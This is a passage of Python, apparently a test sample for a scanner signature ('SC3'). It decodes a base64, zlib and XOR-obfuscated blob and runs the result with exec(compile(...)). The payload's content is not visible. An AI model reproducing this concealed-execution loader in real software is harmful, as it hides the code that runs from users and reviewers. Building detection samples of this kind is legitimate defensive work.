qX/9Rj60SDE0S5k+cT+mbMKgezVrp7IAO4gpHwhCtfQfZwe1+2Gzrfs2qT2/u83c9qo2i8vr8fc9Ufsx/SdAV/Pr1x9N1i0N"
_K = bytes.fromhex("99d79e51e6198bf071475790")

def _xor(buf, k):
    return bytes(b ^ k[i % len(k)] for i, b in enumerate(buf))

def _decode():
    inner = zlib.decompress(base64.b64decode(_OUTER))
    return _xor(base64.b64decode(inner), _K).decode("utf-8")

if __name__ == "__main__":
    # SC3 signature: base64.b64decode(...) -> exec / compile near by
    exec(compile(_decode(), "<runtime>", "exec"), {})
